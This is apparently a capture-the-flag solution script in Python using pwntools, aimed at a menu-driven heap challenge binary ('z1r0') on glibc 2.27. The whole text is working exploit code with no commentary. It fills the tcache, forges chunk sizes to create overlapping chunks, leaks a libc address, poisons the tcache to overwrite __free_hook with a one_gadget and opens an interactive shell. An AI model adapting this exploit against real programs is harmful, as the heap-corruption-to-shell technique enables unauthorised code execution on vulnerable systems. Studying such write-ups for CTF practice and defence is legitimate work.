1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93
| from pwn import *
context.log_level = 'debug' file_name = './z1r0'
debug = 0 if debug: r = remote('192.168.124.133', 9999) else: r = process(file_name)
elf = ELF(file_name)
libc = ELF('./2.27/libc-2.27.so')
menu = '> '
def dbg(): gdb.attach(r)
def delete(index): r.sendlineafter(menu, '4') r.sendlineafter('Page: ', str(index))
def show(index): r.sendlineafter(menu, '3') r.sendlineafter('Page: ', str(index))
def edit(index, content): r.sendlineafter(menu, '2') r.sendlineafter('Page: ', str(index)) r.sendlineafter('Content: ', content)
def add1(size): r.sendlineafter(menu, '1') r.sendlineafter(menu, '1') r.sendlineafter('size: ', str(size))
def add2(size): r.sendlineafter(menu, '1') r.sendlineafter(menu, '2') r.sendlineafter('size: ', str(size))
for i in range(7): add1(0xf0) add1(0xf0) add2(0x178) add2(0x178)
for i in range(7): delete(i + 1)
p1 = b'a' * 0x170 + p64(0x980) edit(8, p1)
p2 = b'a' * 0xf0 + p64(0) + p64(0x81) edit(9, p2)
delete(0) delete(9)
for i in range(7): add1(0xf0)
add1(0xf0) add1(0xf0) show(9)
malloc_hook = u64(r.recvuntil('\x7f')[-6:].ljust(8, b'\x00')) - 96 - 0x10 success('malloc_hook = ' + hex(malloc_hook))
libc_base = malloc_hook - libc.sym['__malloc_hook'] free_hook = libc_base + libc.sym['__free_hook']
success('free_hook = ' + hex(free_hook))
one = [0x4f3d5, 0x4f432, 0x10a41c] one_gadget = libc_base + one[1]
delete(6)
p3 = p64(free_hook) edit(9, p3)
add1(0xf0) add1(0xf0)
p4 = p64(one_gadget) edit(10, p4)
delete(0)
r.interactive()
|